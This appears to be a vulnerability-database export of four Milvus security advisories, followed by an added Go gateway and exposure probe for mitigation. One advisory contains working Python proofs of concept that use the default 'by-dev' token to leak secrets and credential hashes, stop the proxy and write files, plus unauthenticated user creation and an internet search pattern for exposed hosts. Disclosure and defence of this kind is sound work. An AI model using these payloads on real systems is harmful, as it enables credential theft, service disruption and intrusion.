{"ecosystem":"go","package":"github.com/milvus-io/milvus","version":null,"bugs":[{"id":5220,"ecosystem":"go","package_name":"github.com/milvus-io/milvus","affected_version":null,"fixed_version":null,"bug_id":"osv:GO-2026-4481","title":"Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise in github.com/milvus-io/milvus","description":"Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise in github.com/milvus-io/milvus.\n\nNOTE: The source advisory for this report contains additional versions that could not be automatically mapped to standard Go module versions.\n\n(If this is causing false-positive reports from vulnerability scanners, please suggest an edit to the report.)\n\nThe additional affected modules and versions are: github.com/milvus-io/milvus before v2.5.27, from v2.6.0 before v2.6.10.","severity":"medium","status":"open","source":"osv","source_url":"https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6","labels":["BIT-milvus-2026-26190","CVE-2026-26190","GHSA-7ppg-37fh-vcr6"],"created_at":"2026-04-26 03:01:56.826683+00:00","updated_at":"2026-04-26 03:01:56.826683+00:00"},{"id":5219,"ecosystem":"go","package_name":"github.com/milvus-io/milvus","affected_version":"0.10.4","fixed_version":"0.10.3-0.20251107071934-6102f001a971","bug_id":"osv:GO-2025-4114","title":"Milvus Proxy has a Critical Authentication Bypass Vulnerability in github.com/milvus-io/milvus","description":"Milvus Proxy has a Critical Authentication Bypass Vulnerability in github.com/milvus-io/milvus.\n\nNOTE: The source advisory for this report contains additional versions that could not be automatically mapped to standard Go module versions.\n\n(If this is causing false-positive reports from vulnerability scanners, please suggest an edit to the report.)\n\nThe additional affected modules and versions are: github.com/milvus-io/milvus before v2.4.24, from v2.5.0 before 
v2.5.21, from v2.6.0 before v2.6.5.","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/milvus-io/milvus/security/advisories/GHSA-mhjq-8c7m-3f7p","labels":["BIT-milvus-2025-64513","CVE-2025-64513","GHSA-mhjq-8c7m-3f7p"],"created_at":"2026-04-26 03:01:56.823964+00:00","updated_at":"2026-04-26 03:01:56.823964+00:00"},{"id":5218,"ecosystem":"go","package_name":"github.com/milvus-io/milvus","affected_version":"0.10.4","fixed_version":"2.4.24","bug_id":"osv:GHSA-mhjq-8c7m-3f7p","title":"Milvus Proxy has a Critical Authentication Bypass Vulnerability","description":"### Impact\n_What kind of vulnerability is it? Who is impacted?_\nAn unauthenticated attacker can exploit this vulnerability to bypass all authentication mechanisms in the Milvus Proxy component, gaining full administrative access to the Milvus cluster.\nThis grants the attacker the ability to read, modify, or delete data, and to perform privileged administrative operations such as database or collection management.\nAll users running affected Milvus versions are strongly advised to upgrade immediately.\n\n### Patches\n_Has the problem been patched? 
What versions should users upgrade to?_\nThis issue has been fixed in the following versions:\n\t•\tMilvus 2.4.24\n\t•\tMilvus 2.5.21\n\t•\tMilvus 2.6.5\n\nUsers should upgrade to these patched versions or later to mitigate the vulnerability.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\nIf immediate upgrade is not possible, a temporary mitigation can be applied by removing the sourceID header from all incoming requests at the gateway, API gateway, or load balancer level before they reach the Milvus Proxy.\nThis prevents attackers from exploiting the authentication bypass behavior.\n\n### References\n_Are there any links users can visit to find out more?_\n\nThe following pull requests contain the fixes for the affected Milvus branches:\n\t•\t[Fix for 2.4 branch](https://github.com/milvus-io/milvus/pull/45391)\n\t•\t[Fix for 2.5 branch](https://github.com/milvus-io/milvus/pull/45383)\n\t•\t[Fix for 2.6 branch](https://github.com/milvus-io/milvus/pull/45379)\n\nSpecial thanks to the Volcengine Milvus team at ByteDance (liumingzhe.5689@bytedance.com) for responsibly discovering, reporting, and coordinating the disclosure of this critical authentication bypass vulnerability with the Milvus maintainers.","severity":"critical","status":"fixed","source":"osv","source_url":"https://github.com/milvus-io/milvus/security/advisories/GHSA-mhjq-8c7m-3f7p","labels":["BIT-milvus-2025-64513","CVE-2025-64513","GO-2025-4114"],"created_at":"2026-04-26 03:01:56.821232+00:00","updated_at":"2026-04-26 03:01:56.821232+00:00"},{"id":5217,"ecosystem":"go","package_name":"github.com/milvus-io/milvus","affected_version":null,"fixed_version":"2.5.27","bug_id":"osv:GHSA-7ppg-37fh-vcr6","title":"Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise","description":"## Summary\n\nMilvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:\n\n1. 
The `/expr` debug endpoint uses a weak, predictable default authentication token derived from `etcd.rootPath` (default: `by-dev`), enabling arbitrary expression evaluation.\n2. The full REST API (`/api/v1/*`) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.\n\n## Details\n\n### Vulnerability 1: Weak Default Authentication on `/expr` Endpoint\n\nThe `/expr` endpoint on port 9091 accepts an `auth` parameter that defaults to the `etcd.rootPath` value (`by-dev`). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:\n\n- **Information/Credential Disclosure**: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via `param.MinioCfg.SecretAccessKey.GetValue()`, `rootcoord.meta.GetCredential(ctx, 'root')`, etc.\n- **Denial of Service**: Invoking `proxy.Stop()` to shut down the proxy service.\n- **Arbitrary File Write (potential RCE)**: Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.\n\n### Vulnerability 2: Unauthenticated REST API on Metrics Port\n\nBusiness-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via `registerHTTPServer()` in [`internal/distributed/proxy/service.go` (line 170)](https://github.com/milvus-io/milvus/blob/9996e8d1cebff7e7108bcb16d43124236de77438/internal/distributed/proxy/service.go#L170). 
These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.\n\nAn attacker can perform any business operation without credentials, including:\n\n- Creating, listing, and deleting collections\n- Inserting and querying data\n- Creating, listing, and deleting user credentials\n- Modifying user passwords\n\n## Proof of Concept\n\n### PoC 1 — `/expr` Endpoint Exploitation\n\n```python\nimport requests\n\nurl = \"http://<target>:9091/expr\"\n\n# Leak sensitive configuration (e.g., MinIO secret key)\nres = requests.get(url, params={\n    \"auth\": \"by-dev\",\n    \"code\": \"param.MinioCfg.SecretAccessKey.GetValue()\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Retrieve hashed credentials for the root user\nres = requests.get(url, params={\n    \"auth\": \"by-dev\",\n    \"code\": \"rootcoord.meta.GetCredential(ctx, 'root')\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Denial of Service — stop the proxy\nres = requests.get(url, params={\n    \"auth\": \"by-dev\",\n    \"code\": \"proxy.Stop()\"\n}, timeout=5)\n\n# Arbitrary file write (potential RCE)\nfor cmd in [\n    'param.Save(\"proxy.accessLog.localPath\", \"/tmp\")',\n    'param.Save(\"proxy.accessLog.formatters.base.format\", \"whoami\")',\n    'param.Save(\"proxy.accessLog.filename\", \"evil.sh\")',\n    'querycoord.etcdCli.KV.Put(ctx, \"by-dev/config/proxy/accessLog/enable\", \"true\")'\n]:\n    requests.get(url, params={\"auth\": \"by-dev\", \"code\": cmd}, timeout=5)\n```\n\n### PoC 2 — Unauthenticated REST API Access\n\n```python\nimport requests\n\ntarget_url = \"http://<target>:9091\"\n\n# Create a user without any authentication\nres = requests.post(f\"{target_url}/api/v1/credential\", json={\n    \"username\": \"attacker_user\",\n    \"password\": \"MTIzNDU2Nzg5\",\n})\nprint(res.json())\n\n# List all users\nres = requests.get(f\"{target_url}/api/v1/credential/users\")\nprint(res.json())  # {'status': {}, 
'usernames': ['root', 'attacker_user']}\n\n# Create and delete collections, insert data — all without authentication\n```\n\n## Internet Exposure\n\nA significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:\n\n```\nhttp.body=\"404 page not found\" && port=\"9091\"\n```\n\nThis indicates the vulnerability is actively exploitable in real-world production environments.\n\n## Impact\n\nAn unauthenticated remote attacker with network access to port 9091 can:\n\n1. **Exfiltrate secrets and credentials** — MinIO keys, etcd credentials, user password hashes, and all internal configuration values.\n2. **Manipulate all data** — Create, modify, and delete collections, insert or remove data, bypassing all application-level access controls.\n3. **Manage user accounts** — Create administrative users, reset passwords, and escalate privileges.\n4. **Cause denial of service** — Shut down proxy services, drop databases, or corrupt metadata.\n5. **Write arbitrary files** — Potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.\n\n## Remediation\n\n### Recommended Fixes\n\n1. **Remove or disable the `/expr` endpoint** in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default.\n2. **Do not register business API routes on the metrics port.** Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.\n3. **Bind port 9091 to localhost by default** (`127.0.0.1:9091`) so it is not externally accessible unless explicitly configured.\n4. 
**Enforce authentication on all API endpoints**, regardless of which port they are served on.\n\n### User Mitigations (until patched)\n\n- Block external access to port 9091 using firewall rules or network policies.\n- If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.\n- Change the `etcd.rootPath` from the default value `by-dev` to a strong, random value (partial mitigation only — does not address the unauthenticated REST API).\n\n## Credit\n\nThis vulnerability was discovered and responsibly reported by **YingLin Xie** (xieyinglin@hust.edu.cn). It was independently reported by [0x1f](https://github.com/0x1f) and zznQ ([ac0d3r](https://github.com/ac0d3r)).","severity":"critical","status":"fixed","source":"osv","source_url":"https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6","labels":["BIT-milvus-2026-26190","CVE-2026-26190","GO-2026-4481"],"created_at":"2026-04-26 03:01:56.818313+00:00","updated_at":"2026-04-26 03:01:56.818313+00:00"}],"total":4,"_cache":"hit"}
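Two of the records above describe actions an operator can take before upgrading: GHSA-mhjq-8c7m-3f7p says to strip the sourceID header at a gateway before requests reach the Milvus Proxy, and GHSA-7ppg-37fh-vcr6 shows that an affected build answers `GET /api/v1/credential/users` on port 9091 with `{'status': {}, 'usernames': [...]}` and no credentials. The Go program below is an added example written for this page; it is not code from the Milvus project or from either advisory. It implements both as small, testable units: an HTTP reverse proxy (`NewGateway`, `StripSourceID`) that deletes the header on every forwarded request, and a non-destructive probe (`CheckMetricsPort`) that reports whether a host's management port leaks the user list unauthenticated. Assumptions not stated on the page: the gateway covers only HTTP traffic (the advisories also mention the proxy's gRPC port, which this does not touch); the probe treats a 200 response with a `usernames` array as the exposed state and anything else as not exposed; and it deliberately does not call `/expr`. The listeners in `main` and `fakeMetricsPort` are constructed stand-ins, not real Milvus instances.

```go
package main

import (
	"encoding/json"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"net/url"
	"strings"
	"time"
)

// StripSourceID deletes the sourceID header before the request is forwarded.
// net/http canonicalises header names, so one Del covers "sourceID",
// "SourceID" and "sourceid" alike.
func StripSourceID(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		r.Header.Del("sourceID")
		next.ServeHTTP(w, r)
	})
}

// NewGateway returns a reverse proxy to upstream (assumed here to be the Milvus
// proxy's HTTP listener) that applies StripSourceID to every request.
func NewGateway(upstream string) (http.Handler, error) {
	u, err := url.Parse(upstream)
	if err != nil {
		return nil, err
	}
	return StripSourceID(httputil.NewSingleHostReverseProxy(u)), nil
}

// Exposure is the result of probing one host's metrics/management port.
type Exposure struct {
	Reachable           bool     // some HTTP answer came back
	UnauthenticatedREST bool     // user list returned with no credentials
	Usernames           []string // the leaked list, if any
}

// CheckMetricsPort sends one credential-free GET to the user-listing route on
// base (e.g. http://host:9091). Assumption: an affected build returns 200 with
// a JSON "usernames" array, as in the advisory's PoC output; a patched,
// firewalled or localhost-bound instance does not.
func CheckMetricsPort(base string, timeout time.Duration) Exposure {
	client := &http.Client{Timeout: timeout}
	resp, err := client.Get(strings.TrimRight(base, "/") + "/api/v1/credential/users")
	if err != nil {
		return Exposure{} // refused, filtered or timed out
	}
	defer resp.Body.Close()
	ex := Exposure{Reachable: true}
	if resp.StatusCode != http.StatusOK {
		return ex
	}
	body, err := io.ReadAll(io.LimitReader(resp.Body, 1<<20))
	if err != nil {
		return ex
	}
	var parsed struct {
		Usernames []string `json:"usernames"`
	}
	if json.Unmarshal(body, &parsed) == nil && parsed.Usernames != nil {
		ex.UnauthenticatedREST = true
		ex.Usernames = parsed.Usernames
	}
	return ex
}

// fakeMetricsPort is a constructed stand-in for an affected instance's port
// 9091 (no real Milvus involved); it serves only the user-listing route.
func fakeMetricsPort() *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.URL.Path == "/api/v1/credential/users" {
			w.Header().Set("Content-Type", "application/json")
			fmt.Fprint(w, `{"status":{},"usernames":["root","attacker_user"]}`)
			return
		}
		http.NotFound(w, r)
	}))
}

func main() {
	// Probe a constructed exposed listener and a constructed patched one.
	vuln, patched := fakeMetricsPort(), httptest.NewServer(http.NotFoundHandler())
	defer vuln.Close()
	defer patched.Close()
	fmt.Printf("exposed: %+v\n", CheckMetricsPort(vuln.URL, time.Second))
	fmt.Printf("patched: %+v\n", CheckMetricsPort(patched.URL, time.Second))

	// Send a request carrying sourceID through the gateway; the backend sees none.
	backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		fmt.Printf("backend saw sourceID=%q\n", r.Header.Values("sourceID"))
	}))
	defer backend.Close()
	gw, err := NewGateway(backend.URL)
	if err != nil {
		panic(err)
	}
	front := httptest.NewServer(gw)
	defer front.Close()
	req, _ := http.NewRequest(http.MethodGet, front.URL+"/api/v1/collections", nil)
	req.Header.Set("sourceID", "1")
	if resp, err := http.DefaultClient.Do(req); err == nil {
		resp.Body.Close()
	}
}
```

Run the probe against every host that exposes 9091 in your inventory, not just the ones found by the scanning pattern quoted in the advisory; a `Reachable: true, UnauthenticatedREST: false` result means the port answers but this particular route is not exposed, which does not by itself say anything about `/expr`. The gateway is a stop-gap only: the advisory's fix is to upgrade to 2.4.24, 2.5.21 or 2.6.5.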